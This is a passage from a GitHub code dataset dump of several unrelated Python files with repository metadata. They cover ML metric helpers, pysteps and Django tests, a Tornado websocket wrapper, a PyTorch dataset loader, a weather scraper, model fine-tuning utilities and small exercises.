= True,\n) -> List[float]:\n \"\"\"\n Calculate different metric scores of the model - Accuracy, Recall, and Precision.\n\n Parameters:\n model (Model): Classifier to predict values of X.\n X_train (array): Training set.\n y_train (array): Training set labels.\n X_test (array): Test set.\n y_test (array): Test set labels.\n log_scores (bool): Flag to log the scores. Default is True.\n\n Returns:\n list: List containing metric scores.\n \"\"\"\n \"\"\"\n Calculate different metric scores of the model - Accuracy, Recall, and Precision.\n\n Parameters:\n model (Model): Classifier to predict values of X.\n X_train (array): Training set.\n y_train (array): Training set labels.\n X_test (array): Test set.\n y_test (array): Test set labels.\n log_scores (bool): Flag to log the scores. Default is True.\n\n Returns:\n list: List containing metric scores.\n \"\"\"\n # defining an empty list to store train and test results\n score_list: List[float] = []\n\n # Predictions\n pred_train = model.predict(X_train)\n pred_test = model.predict(X_test)\n\n # Accuracy\n train_acc = model.score(X_train, y_train)\n test_acc = model.score(X_test, y_test)\n\n # Recall\n train_recall = metrics.recall_score(y_train, pred_train)\n test_recall = metrics.recall_score(y_test, pred_test)\n\n # Precision\n train_precision = metrics.precision_score(y_train, pred_train)\n test_precision = metrics.precision_score(y_test, pred_test)\n\n score_list.extend(\n (\n train_acc,\n test_acc,\n train_recall,\n test_recall,\n train_precision,\n test_precision,\n )\n )\n\n if log_scores:\n logger.info(f\"Accuracy on training set : {train_acc}\")\n logger.info(f\"Accuracy on test set : {test_acc}\")\n logger.info(f\"Recall on training set : {train_recall}\")\n logger.info(f\"Recall on test set : {test_recall}\")\n logger.info(f\"Precision on training set : {train_precision}\")\n logger.info(f\"Precision on test set : {test_precision}\")\n\n return score_list\n\n\ndef generate_comparison_frame(\n models: List[Any],\n model_names: List[str],\n X_train: np.ndarray,\n y_train: np.ndarray,\n X_test: np.ndarray,\n y_test: np.ndarray,\n log_scores: bool = True,\n) -> pd.DataFrame:\n \"\"\"\n Generate a comparison DataFrame for given models based on their metrics.\n\n Parameters:\n models (List[ClassifierMixin]): A list of trained sklearn models.\n model_names (List[str]): A list of names corresponding to the models.\n X_train (array): Training set.\n y_train (array): Training set labels.\n X_test (array): Test set.\n y_test (array): Test set labels.\n log_scores (bool): Flag to log the scores. Default is True.\n\n Returns:\n pd.DataFrame: A DataFrame with Train and Test Accuracy, Recall, and Precision for each model.\n \"\"\"\n\n # Initializing empty lists to store metrics\n acc_train, acc_test = [], []\n recall_train, recall_test = [], []\n precision_train, precision_test = [], []\n\n # Loop through models, get metrics, and append to respective lists\n for model in models:\n (\n train_acc,\n test_acc,\n train_recall,\n test_recall,\n train_precision,\n test_precision,\n ) = get_metrics_score(\n model, X_train, y_train, X_test, y_test, log_scores=log_scores\n )\n acc_train.append(np.round(train_acc, 2))\n acc_test.append(np.round(test_acc, 2))\n recall_train.append(np.round(train_recall, 2))\n recall_test.append(np.round(test_recall, 2))\n precision_train.append(np.round(train_precision, 2))\n precision_test.append(np.round(test_precision, 2))\n\n # Create and return comparison DataFrame\n comparison_frame = pd.DataFrame(\n {\n \"Model\": model_names,\n \"Train_Accuracy\": acc_train,\n \"Test_Accuracy\": acc_test,\n \"Train_Recall\": recall_train,\n \"Test_Recall\": recall_test,\n \"Train_Precision\": precision_train,\n \"Test_Precision\": precision_test,\n }\n )\n\n return comparison_frame\n","repo_name":"pablosalvador10/azure-ai-gbb-solution-template","sub_path":"src/training/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":5652,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"31809134944","text":"class Solution:\n def checkDistances(self, s: str, distance: List[int]) -> bool:\n d={}\n ch=ord('a')\n for i in distance:\n d[chr(ch)]=i\n ch+=1\n sl=set()\n for i in range(len(s)):\n for j in range(i+1, len(s)):\n if s[i]==s[j] and d[s[i]]==(j-i)-1:\n sl.add(s[i])\n if sl==set(s):\n return True\n else:\n return False\n \n ","repo_name":"swetha627/LEETCODE","sub_path":"2399-check-distances-between-same-letters/2399-check-distances-between-same-letters.py","file_name":"2399-check-distances-between-same-letters.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"33563200557","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport tempfile\nfrom datetime import datetime\n\nimport numpy as np\nimport pytest\nfrom numpy.testing import assert_array_almost_equal\n\nfrom pysteps.io import import_netcdf_pysteps\nfrom pysteps.io.exporters import _get_geotiff_filename\nfrom pysteps.io.exporters import close_forecast_files\nfrom pysteps.io.exporters import export_forecast_dataset\nfrom pysteps.io.exporters import initialize_forecast_exporter_netcdf\nfrom pysteps.tests.helpers import get_precipitation_fields, get_invalid_mask\n\n# Test arguments\nexporter_arg_names = (\"n_ens_members\", \"incremental\")\n\nexporter_arg_values = [\n (1, None),\n (1, \"timestep\"),\n (2, None),\n (2, \"timestep\"),\n (2, \"member\"),\n]\n\n\ndef test_get_geotiff_filename():\n \"\"\"Test the geotif name generator.\"\"\"\n\n start_date = datetime.strptime(\"201909082022\", \"%Y%m%d%H%M\")\n\n n_timesteps = 50\n timestep = 5\n\n for timestep_index in range(n_timesteps):\n file_name = _get_geotiff_filename(\n \"test/path\", start_date, n_timesteps, timestep, timestep_index\n )\n expected = (\n f\"test/path_201909082022_\" f\"{(timestep_index + 1) * timestep:03d}.tif\"\n )\n assert expected == file_name\n\n\n@pytest.mark.parametrize(exporter_arg_names, exporter_arg_values)\ndef test_io_export_netcdf_one_member_one_time_step(n_ens_members, incremental):\n \"\"\"\n Test the export netcdf.\n Also, test that the exported file can be read by the importer.\n \"\"\"\n\n pytest.importorskip(\"pyproj\")\n\n precip, metadata = get_precipitation_fields(\n num_prev_files=2, return_raw=True, metadata=True, source=\"fmi\"\n )\n\n invalid_mask = get_invalid_mask(precip)\n\n with tempfile.TemporaryDirectory() as outpath:\n # save it back to disk\n outfnprefix = \"test_netcdf_out\"\n file_path = os.path.join(outpath, outfnprefix + \".nc\")\n startdate = metadata[\"timestamps\"][0]\n timestep = metadata[\"accutime\"]\n n_timesteps = 3\n shape = precip.shape[1:]\n\n exporter = initialize_forecast_exporter_netcdf(\n outpath,\n outfnprefix,\n startdate,\n timestep,\n n_timesteps,\n shape,\n metadata,\n n_ens_members=n_ens_members,\n incremental=incremental,\n )\n\n if n_ens_members > 1:\n precip = np.repeat(precip[np.newaxis, :, :, :], n_ens_members, axis=0)\n\n if incremental == None:\n export_forecast_dataset(precip, exporter)\n if incremental == \"timestep\":\n for t in range(n_timesteps):\n if n_ens_members > 1:\n export_forecast_dataset(precip[:, t, :, :], exporter)\n else:\n export_forecast_dataset(precip[t, :, :], exporter)\n if incremental == \"member\":\n for ens_mem in range(n_ens_members):\n export_forecast_dataset(precip[ens_mem, :, :, :], exporter)\n\n close_forecast_files(exporter)\n\n # assert if netcdf file was saved and file size is not zero\n assert os.path.exists(file_path) and os.path.getsize(file_path) > 0\n\n # Test that the file can be read by the nowcast_importer\n output_file_path = os.path.join(outpath, f\"{outfnprefix}.nc\")\n\n precip_new, _ = import_netcdf_pysteps(output_file_path)\n\n assert_array_almost_equal(precip.squeeze(), precip_new.data)\n assert precip_new.dtype == \"single\"\n\n precip_new, _ = import_netcdf_pysteps(output_file_path, dtype=\"double\")\n assert_array_almost_equal(precip.squeeze(), precip_new.data)\n assert precip_new.dtype == \"double\"\n\n precip_new, _ = import_netcdf_pysteps(output_file_path, fillna=-1000)\n new_invalid_mask = precip_new == -1000\n assert (new_invalid_mask == invalid_mask).all()\n","repo_name":"pySTEPS/pysteps","sub_path":"pysteps/tests/test_exporters.py","file_name":"test_exporters.py","file_ext":"py","file_size_in_byte":3843,"program_lang":"python","lang":"en","doc_type":"code","stars":381,"dataset":"github-code","pt":"27"} +{"seq_id":"20788985145","text":"\"\"\"\ndefine User:\n def socket_starts(self,socket) #gets called when the connection is ready; socket is the active connection\n def socket_process(self,identifier,content) #gets called for each message received\n def socket_updates(self) #gets called every 1./30 of a second if socket.updating == True\n def socket_closes(self) #gets called on loss of connection\n\n #note: socket_send(self,identifier,container) gets assigned before socket_starts\nUser can access socket by:\n self.socket_send(identifier,content = None) #to send messages\n self.socket_send() #to close socket\n\nrun_websocket_application_forever(User,path = r\"/websocket\",port = 8888)\n #accepts connections going to path,port\n #when a connection is opened a new User is created\n\"\"\"\n\nimport sys\nsys.path.append(\"tornado-3.1/\")\nimport tornado.ioloop, tornado.web, tornado.websocket\n\nimport json\nfrom queue import Queue,Empty\nimport threading\nimport time\nimport traceback\n\nclass MessageFormatError(Exception):\n pass\n\nclass MessageProcessingError(Exception):\n pass\n \n\n\nclass WebSocket(tornado.websocket.WebSocketHandler):\n active_sockets = set()\n User = None\n send_sleep_time = 1/30 #assumes all calculations in update are instant\n read_sleep_time = 1/1000\n assert (read_sleep_time < send_sleep_time) and (send_sleep_time % read_sleep_time < 1/1000), \"read_sleep_time must be an aproximate fraction of send_sleep_time\"\n\n def open(self):\n self.set_nodelay(True)\n self.active_sockets.add(self)\n\n self.send_queue = Queue()\n self.receive_queue = Queue()\n \n self.running = True\n self.updating = False\n\n self.user = None #to be initialized in the thread\n\n self.thread = threading.Thread(target = self.run)\n self.thread.start()\n\n def on_message(self, messages):\n self.receive_queue.put_nowait(messages)\n\n def load_messages(self):\n while True:\n try:\n messages = self.receive_queue.get_nowait()\n except Empty:\n break #break out of the while True\n\n try:\n messages = json.loads(messages)\n except Exception as e:\n raise MessageFormatError(e)\n \n if type(messages) is not list:\n raise MessageFormatError()\n\n for m in messages:\n if (type(m) is not list) or not(1 <= len(m) <= 2):\n raise MessageFormatError()\n\n if type(m[0]) is not str:\n raise MessageFormatError()\n\n try:\n if len(m) == 2:\n self.user.socket_process(m[0],m[1])\n else:\n self.user.socket_process(m[0],None)\n except Exception as e:\n raise MessageProcessingError(e)\n\n\n def dump_messages(self):\n messages = []\n \n while True:\n try:\n messages.append(self.send_queue.get_nowait())\n except Empty:\n break #break out of the while True\n\n if len(messages):\n self.write_message(json.dumps(messages))\n\n def run(self):\n try:\n self.user = self.User()\n self.user.socket_send = self.send\n self.user.socket_starts()\n\n while self.running:\n\n self.user.socket_updates()\n self.dump_messages()\n now = time.time()\n while time.time()-now < self.send_sleep_time: #i want to read more often then dumping messages\n self.load_messages()\n time.sleep(self.send_sleep_time)\n\n except:\n traceback.print_last()\n finally:\n try:\n self.user.socket_closes()\n except:\n traceback.print_last()\n try:\n self.close()\n except:\n pass #i tryed, this is tornado's fault if it doesn't close\n\n def on_close(self):\n self.running = False\n self.active_sockets.remove(self)\n\n #def close(self): inherited\n \n def __call__(self,identifier = None,content = None):\n if identifier is None:\n self.close()\n else:\n assert isinstance(identifier,str), \"identifier must be a string.\"\n if content is not None:\n self.send_queue.put_nowait([identifier,content])\n else:\n self.send_queue.put_nowait([identifier])\n\n send = __call__\n\n\n\n\n\ndef run_websocket_application_forever(User,path = r\"/websocket\",port = 8888):\n #User class checks\n assert callable(getattr(User, \"socket_process\", None)), \"class has not defined socket_process(self,indentifier,content).\"\n assert callable(getattr(User, \"socket_updates\", None)), \"class has not defined socket_updates(self).\"\n assert callable(getattr(User, \"socket_starts\", None)), \"class has not defined socket_starts(self).\"\n assert callable(getattr(User, \"socket_closes\", None)), \"class has not defined socket_closes(self).\"\n WebSocket.User = User\n \n\n application = tornado.web.Application([\n (path, WebSocket),\n ])\n\n application.listen(port)\n print(\"WebSocket application forever loop.\")\n tornado.ioloop.IOLoop.instance().start()\n\n","repo_name":"csiz/ep2","sub_path":"server/connections/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"16744381844","text":"from django.test import TestCase\nfrom rest_framework.test import RequestsClient, APITestCase\nfrom django.contrib.auth.models import User, Permission, Group, ContentType\nfrom rest_framework import status\nimport json\n\nfrom pos_backend.core.tests import setup_items\nfrom .models import Order, OrderItem\n\n\n# Create your tests here.\n\nclient = RequestsClient()\nclient.headers.update({'Content-Type': 'application/json'})\n\ndef setup_user_assistant():\n user = User.objects.create_user(\n username='user_assistant',\n email='user_assistant@user.com',\n password='password_assistant'\n )\n group = Group.objects.create(\n name=\"Assistant\"\n )\n user.groups.add(group)\n\n content_type_list = ('order', 'orderitem',)\n for content_type_model in content_type_list:\n content_type = ContentType.objects.get(\n app_label='order',\n model=content_type_model\n )\n permissions = Permission.objects.filter(content_type=content_type)\n for permission in permissions:\n group.permissions.add(permission)\n\n content_type_list_viewonly = ('item',)\n for content_type_model in content_type_list_viewonly:\n content_type = ContentType.objects.get(\n app_label='core',\n model=content_type_model\n )\n permissions = Permission.objects.filter(\n content_type=content_type,\n codename='view_{0}'.format(content_type_model)\n )\n for permission in permissions:\n group.permissions.add(permission)\n\n return {'user': user, 'password': 'password_assistant'}\n\n\ndef setup_user_token(user):\n url = 'http://localhost:8000/api/token/'\n credentials = {\n \"username\": user['user'].username,\n \"password\": user['password']\n }\n\n response = client.post(\n url,\n data=json.dumps(credentials)\n )\n return response.json()\n\n\nclass OrderTest(TestCase):\n def setUp(self):\n self.items = setup_items()\n self.user = setup_user_assistant()\n\n def test_order_anonymous(self):\n order = Order.objects.create()\n for idx, item in enumerate(self.items, start=1):\n order.item.create(\n name=item,\n quantity=idx\n )\n self.assertIsNone(order, msg=order.pk)\n\n def test_order_items(self):\n self.client.force_login(user=self.user['user'])\n\n order = Order.objects.create(\n assigned=self.user['user']\n )\n for idx, item in enumerate(self.items, start=1):\n order.item.create(\n name=item,\n quantity=idx\n )\n self.assertEqual(order.total, 300)\n self.assertEqual(order.assigned, self.user['user'])\n self.assertEqual(order.item.all()[0].item_total, 100)\n self.assertEqual(order.item.all()[1].item_total, 200)\n\n\nclass OrderAPITest(APITestCase):\n def setUp(self):\n self.items = setup_items()\n self.user = setup_user_assistant()\n self.user_token = setup_user_token(self.user)\n\n def test_items_access(self):\n url = 'http://localhost:8000/api/item/'\n header = {\"Authorization\": \"Bearer {0}\".format(\n self.user_token['access']\n )}\n response = client.get(\n url,\n headers=header\n )\n self.assertEqual(\n response.status_code,\n status.HTTP_200_OK,\n msg=response.json()\n )\n\n def test_item_anonymous(self):\n url = 'http://localhost:8000/api/item/'\n response = client.get(\n url,\n )\n self.assertEqual(\n response.status_code,\n status.HTTP_401_UNAUTHORIZED,\n msg=response.json()\n )\n\n def test_order_items_api(self):\n url = 'http://localhost:8000/api/order/'\n header = {\"Authorization\": \"Bearer {0}\".format(\n self.user_token['access']\n )}\n response = client.get(\n url,\n headers=header\n )\n data = {\"item\": []}\n for idx, item in enumerate(self.items, start=1):\n data['item'].append({\n \"name\": item.pk,\n \"quantity\": idx\n })\n response = client.post(\n url,\n data=json.dumps(data),\n headers=header\n )\n order = response.json()\n self.assertEqual(order.total, 300)\n","repo_name":"ZeroExistence/pos_backend","sub_path":"pos_backend/order/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":4450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"36467467123","text":"import os\nimport torch\nimport numpy as np\nimport pandas as pd\nimport os.path as osp\nimport shutil\n\nfrom PIL import Image\nfrom torch.utils.data import Dataset, DataLoader\n\n\nclass initialize_dataset:\n def __init__(self, config, batch_csv):\n self.config = config\n self.dataset_params = config[\"dataset_params\"]\n self.dataset_root = self.dataset_params[\"root_dir\"]\n self.dataset = self.dataset_params[\"use\"]\n self.dataset_base = osp.join(os.getcwd(), self.dataset_root, self.dataset)\n if batch_csv is not None:\n csv = batch_csv\n else:\n csv = self.dataset_params[self.dataset][\"csv_filename\"]\n self.dataset_file = osp.join(self.dataset_base,\"batch-info\", csv)\n self.images_dir = self.dataset_params[self.dataset][\"images_dir\"]\n\n def create_dataset_csv(self):\n if osp.isfile(self.dataset_file):\n return\n df = pd.DataFrame(os.listdir(self.images_dir))\n df.to_csv(self.dataset_file, index=False, header=False)\n\n\nclass custom_dataset(Dataset):\n def __init__(self, dataset_file, images_dir, img_resolution, outdir):\n self.images_df = pd.read_csv(dataset_file, index_col=False, header=None)\n self.images_dir = images_dir\n self.img_resolution = img_resolution\n self.outdir = outdir\n\n def __len__(self):\n return len(self.images_df)\n\n def __getitem__(self, index):\n\n image_name = self.images_df.iat[index, 0]\n image = osp.join(self.images_dir, image_name)\n\n name_arr = image_name.split(\".\")\n target_image = osp.join(self.outdir, name_arr[0], \"target.\" + name_arr[1])\n if not osp.isfile(target_image):\n os.makedirs(osp.join(self.outdir, name_arr[0]), exist_ok=True)\n shutil.copy2(image, target_image)\n\n target_pil = Image.open(image).convert(\"RGB\")\n w, h = target_pil.size\n s = min(w, h)\n target_pil = target_pil.crop(\n ((w - s) // 2, (h - s) // 2, (w + s) // 2, (h + s) // 2)\n )\n target_pil = target_pil.resize(\n (self.img_resolution, self.img_resolution), Image.LANCZOS\n )\n target_uint8 = np.array(target_pil, dtype=np.uint8)\n\n return (\n torch.tensor(\n target_uint8.transpose([2, 0, 1]), device=torch.device(\"cuda\")\n ),\n image_name,\n )\n\n\ndef get_dataloader(config, batch_csv, outdir):\n init_dataset = initialize_dataset(config, batch_csv)\n init_dataset.create_dataset_csv()\n gen = config[\"projector_params\"][\"general\"][\"use_generator\"]\n gen_resolution = config[\"projector_params\"][\"generators\"][gen][\"img_resolution\"]\n dataset = custom_dataset(\n init_dataset.dataset_file, init_dataset.images_dir, gen_resolution, outdir\n )\n dataloader = DataLoader(\n dataset,\n shuffle=False,\n batch_size=config[\"projector_params\"][\"general\"][\"batch_size\"],\n )\n return dataloader\n","repo_name":"rv-harsha/face-forensics-GAN-inversion","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":2969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"30859336211","text":"from typing import List, Optional\n\nfrom django.urls import reverse\nfrom ninja import (\n Schema,\n Field\n)\n\n\nclass UserSchema(Schema):\n username: str\n profile_url: str\n\n @staticmethod\n def resolve_profile_url(obj):\n return reverse('profile_detail', args=(obj.username, ))\n\n\nclass ItemListSchema(Schema):\n identifier: str\n title: str = Field(..., alias=\"__str__\")\n city: str = None\n county_equivalent: str = None\n state: str = None\n year_vol: str\n sheet_ct: int\n stats: dict\n loaded_by: Optional[UserSchema]\n load_date: str\n volume_no: int = None\n urls: dict\n\n @staticmethod\n def resolve_load_date(obj):\n load_date_str = \"\"\n if obj.load_date:\n load_date_str = obj.load_date.strftime(\"%Y-%m-%d\")\n return load_date_str\n\n @staticmethod\n def resolve_year_vol(obj):\n year_vol = obj.year\n if obj.volume_no is not None:\n year_vol = f\"{obj.year} vol. {obj.volume_no}\"\n return str(year_vol)\n\n @staticmethod\n def resolve_stats(obj):\n items = obj.sort_lookups()\n unprep_ct = len(items['unprepared'])\n prep_ct = len(items['prepared'])\n georef_ct = len(items['georeferenced'])\n percent = 0\n if georef_ct > 0:\n percent = int((georef_ct / (unprep_ct + prep_ct + georef_ct)) * 100)\n\n main_lyrs_ct = 0\n if obj.sorted_layers:\n main_lyrs_ct = len(obj.sorted_layers['main'])\n mm_ct, mm_todo, mm_percent = 0, 0, 0\n if main_lyrs_ct != 0:\n # make sure 0/0 appears at the very bottom, then 0/1, 0/2, etc.\n mm_percent = main_lyrs_ct * .000001\n mm_display = f\"0/{main_lyrs_ct}\"\n if obj.multimask is not None:\n mm_ct = len(obj.multimask)\n mm_todo = main_lyrs_ct - mm_ct\n if mm_ct > 0:\n mm_display = f\"{mm_ct}/{main_lyrs_ct}\"\n mm_percent = mm_ct / main_lyrs_ct\n mm_percent += main_lyrs_ct * .000001\n\n return {\n \"unprepared_ct\": unprep_ct,\n \"prepared_ct\": prep_ct,\n \"georeferenced_ct\": georef_ct,\n \"percent\": percent,\n \"mm_ct\": mm_todo,\n \"mm_display\": mm_display,\n \"mm_percent\": mm_percent,\n }\n\n @staticmethod\n def resolve_mj_exists(obj):\n return obj.mosaic_geotiff is not None\n\n @staticmethod\n def resolve_urls(obj):\n return {\n \"summary\": reverse('volume_summary', args=(obj.identifier, )),\n \"viewer\": reverse('volume_summary', args=(obj.identifier, )),\n }\n\n","repo_name":"mradamcox/ohmg","sub_path":"content/schemas.py","file_name":"schemas.py","file_ext":"py","file_size_in_byte":2622,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"27"} +{"seq_id":"74899957831","text":"#solution of this task based on Stack data structure and operations with it\n\ndef toPostFixExpression(e):\n prec = {} # stores operator priorities, where 3 - the highest priority, 1 - the lowest\n prec[\"*\"] = 3 \n prec[\"/\"] = 3\n prec[\"+\"] = 2\n prec[\"-\"] = 2\n prec[\"(\"] = 1\n \n stack = [] # for keeping operators.\n output = [] # list for output.\n \n for el in e:\n if el.isdigit():\n output.append(el) # appending to the end of the output list.\n \n elif el == '(':\n stack.insert(0,el)\n \n elif el == ')':\n top_element = stack[0] # imitation of Stack method pop()\n del stack[0]\n \n while top_element != '(':\n output.append(top_element) \n top_element = stack[0] \n del stack[0]\n \n else:\n while len(stack) > 0 and prec[stack[0]] >= prec[el]: # if stack is not empty and priority of first stack element higher\n output.append(stack[0])\n del stack[0]\n stack.insert(0,el)\n \n while len(stack) > 0: # if stack is not empty\n output.append(stack[0])\n del stack[0]\n \n return output\n","repo_name":"katesem/Python-online-marathon","sub_path":"sprint_1/s1_task5.py","file_name":"s1_task5.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"11974643215","text":"from src.com.hsjry.strategy.Strategy import *\n\n\nclass BootStrap:\n \"\"\"\n 启动引导类\n \"\"\"\n\n def __init__(self, strategyList: Strategy = []):\n \"\"\"\n 初始化策略\n :param strategyList:\n \"\"\"\n self.__gitStrategyDict = {}\n for strategy in strategyList:\n self.__gitStrategyDict[strategy.getName()] = strategy\n\n def getStrategy(self, strategyName: str) -> Strategy:\n \"\"\"\n 获取策略\n :param strategyName:\n :return:\n \"\"\"\n strategy = self.__gitStrategyDict.setdefault(strategyName)\n if None == strategy:\n raise RuntimeError(strategyName + \" 参数非法,不存在的命令!!!\")\n return strategy\n\n\ndef init() -> BootStrap:\n branchStrategy = BranchStrategy()\n tagStrategy = TagStrategy()\n mrStrategy = MRStrategy()\n buildStrategy = BuildStrategy()\n\n lis = [branchStrategy, tagStrategy, mrStrategy, buildStrategy]\n return BootStrap(lis)\n","repo_name":"17610070778/git-helper","sub_path":"src/com/hsjry/boot/BootStrap.py","file_name":"BootStrap.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"1745762300","text":"import urllib2\nimport cookielib\ndef weather():\n cookieJar = cookielib.CookieJar()\n opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookieJar))\n\n url = \"https://www.wunderground.com/global/stations/42182.html\"\n request = urllib2.Request(url)\n page = opener.open(request)\n\n # This is one big string\n rawdata = page.read()\n # This breaks it up into lines\n lines_of_data = rawdata.split('\\n')\n\n # This is one line in the raw data that looks interesing. I'm going to\n # filter the raw data based on the \"og:title\" text.\n # \n #'\n\n # The \"if line.find(\" bit is the filter. \n special_lines = [line for line in lines_of_data if line.find('og:title')>-1]\n\n # Now we clean up - this is very crude, but you can improve it with\n # exactly what you want to do.\n info = special_lines[0].replace('\"','').split('content=')[1]\n sections = info.split('|')\n if(sections[2]==' Rain />' or sections[2]==' Mostly Cloudy />'):\n print(sections)\n return False\n else:\n print(sections)\n return True\nif(__name__=='__main__'):\n print(weather())\n","repo_name":"raghav16259/Garden-Bot","sub_path":"weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"73406996231","text":"from flax.core import frozen_dict\nfrom flax.training import checkpoints\n\n\ndef finetune_from_lstm(state, restore_checkpoint_dir, config):\n \"\"\"Updates the current state for fine-tuning from a pre-trained LSTM.\n\n It updates state using some of the values from the restore_checkpoint_dir.\n\n The Transformer node_span_encoder, as well as the IPA-GNN lstm weights.\n\n Branch decisions and raise decisions weights are not going to be loaded.\n \"\"\"\n old_state = checkpoints.restore_checkpoint(config.restore_checkpoint_dir, None)\n old_params = old_state['params']\n\n state = state.replace(step=int(old_state['step']))\n state = state.replace(rng=old_state['rng'])\n\n params = state.params\n params_copy = params.unfreeze()\n params_copy['node_span_encoder'] = old_params['input_embedder']\n\n for n in range(config.rnn_layers):\n params_copy['ipagnn']['ipagnn_layer_scan'][f'lstm_{n}'] = old_params['encoder'][f'lstm_{n}']['OptimizedLSTMCell_0']\n\n state = state.replace(params=frozen_dict.FrozenDict(params_copy))\n return state\n\n\ndef finetune_from_ipagnn(state, restore_checkpoint_dir, config):\n \"\"\"Updates the current state for fine-tuning from a pre-trained IPAGNN.\n\n It updates state using some of the values from the restore_checkpoint_dir.\n\n The Transformer node_span_encoder, as well as the IPA-GNN lstm weights and\n branch decision weights are loaded.\n\n Args:\n state: The current method's state.\n restore_checkpoint_dir: The directory to load the IPAGNN checkpoint from.\n config: The experiment config.\n Returns:\n A new version of state, with parameters taken from the pre-trained IPAGNN.\n \"\"\"\n old_state = checkpoints.restore_checkpoint(config.restore_checkpoint_dir, None)\n state = state.replace(step=int(old_state['step']))\n # state = state.replace(opt_state=old_state['opt_state'])\n state = state.replace(rng=old_state['rng'])\n params = state.params\n old_params = old_state['params']\n key_paths = [\n # Note we omit loading the output layer weights.\n ('node_span_encoder',),\n ('ipagnn', 'ipagnn_layer_scan', 'branch_decide_dense',),\n ] + [\n ('ipagnn', 'ipagnn_layer_scan', f'lstm_{n}',)\n for n in range(config.rnn_layers)\n ]\n params_copy = params.unfreeze()\n for key_path in key_paths:\n params_component = params_copy\n old_params_component = old_params\n for key_path_component in key_path[:-1]:\n params_component = params_component[key_path_component]\n old_params_component = old_params_component[key_path_component]\n\n params_component[key_path[-1]] = old_params_component[key_path[-1]]\n state = state.replace(params=frozen_dict.FrozenDict(params_copy))\n return state\n","repo_name":"google-research/runtime-error-prediction","sub_path":"core/lib/finetune.py","file_name":"finetune.py","file_ext":"py","file_size_in_byte":2657,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"27"} +{"seq_id":"37701343327","text":"\nfrom django.conf.urls import include, url\nfrom views import *\n\nurlpatterns = [\n url(r'^$',index,name='index'),\n url(r'^category$',category,name='category'),\n url(r'^archive$',archive,name='archive'),\n url(r'^tag$',tag,name='tag'),\n url(r'^article$',article,name='article'),\n url(r'^comment_post/$', comment_post, name='comment_post'),\n url(r'^login$', login_x , name='login'),\n url(r'^logout$', logout_x , name='logout'),\n]\n\n","repo_name":"BraveChen95/boke","sub_path":"boke/gao/url.py","file_name":"url.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"40830146704","text":"#here have set up bare bones 'User' class for testing\r\n\r\n\r\nimport random\r\nimport bpy\r\n\r\nclass User:\r\n\r\n requirePassword = True\r\n maxUsers = 1000 #not used\r\n usersList = []\r\n\r\n def __init__(self, name, id_num, DOB):\r\n self.name = name\r\n self.id_num = id_num\r\n self.DOB = DOB\r\n## self.pointer = User.usersList(find(self, User.usersList) - 1) #how to point to previous user?\r\n self.usersList.append(self)\r\n\r\n def showUserByPosition(position):\r\n print(User.usersList[position].name)\r\n print(User.usersList[position].id_num)\r\n print(User.usersList[position].DOB,\"\\n\")\r\n\r\n\r\n def showUsers():\r\n #shows each all user objects\r\n #could just use specific 'showUser' function for each\r\n print(\"\\nThere are currently\", len(User.usersList), \"users in the system....\")\r\n for user in User.usersList:\r\n## print(\"\\n\")\r\n print(user.name)\r\n print(user.id_num)\r\n print(user.DOB,\"\\n\")\r\n\r\n\r\n def checkId_num(newNumber):\r\n for k in range(0,len(User.usersList)):\r\n## print(\"iteration # \", k, \" = \", User.usersList[k].id_num)\r\n if(User.usersList[k].id_num == newNumber ):\r\n return False\r\n return True\r\n\r\n\r\ndef getUniqueNumber():\r\n#check that there is not already this id_num in database \r\n unique = False \r\n while(not unique): \r\n num = random.randrange(1,User.maxUsers)\r\n #print(\"Inside getUniqueNumber(), the number generated is: \",num) \r\n if(User.checkId_num(num) == True):\r\n unique = True \r\n return num\r\n\r\n\r\nprint(\"\\n\")\r\nuser1 = User(\"Bob Micheals\", getUniqueNumber(), \"12/10/87\")\r\nuser2 = User(\"Tom Smith\", getUniqueNumber(), \"01/28/98\")\r\nuser3 = User(\"Sarah Smith\", getUniqueNumber(), \"11/15/00\")\r\nuser4 = User(\"Sean Smith\", getUniqueNumber(), \"07/14/89\")\r\nuser5 = User(\"tara toga\", getUniqueNumber(), \"03/22/93\")\r\n\r\n\r\nprint(\"\\ntesting 'showUserByPosition' function.....\")\r\nindex = 1 #this is the position in the Users list (first)\r\nUser.showUserByPosition(index)\r\n\r\n\r\nprint(\"\\ntesting 'showUsers' function.....\")\r\nUser.showUsers()\r\n\r\n\r\n##################################################################\r\n\r\n\r\n##https://stackoverflow.com/questions/26628525/importerror-no-module-named-bpy\r\n# NO MODULE NAMED BPI ERROR!!!!!!!!\r\nimport bpy\r\n\r\n# deselect all\r\nbpy.ops.object.select_all(action='DESELECT')\r\n\r\n# selection\r\nbpy.data.objects['user4'].select = True\r\n\r\n# remove it\r\nbpy.ops.object.delete()\r\n\r\n\r\n\r\nprint(\"\\ntesting 'showUsers' after 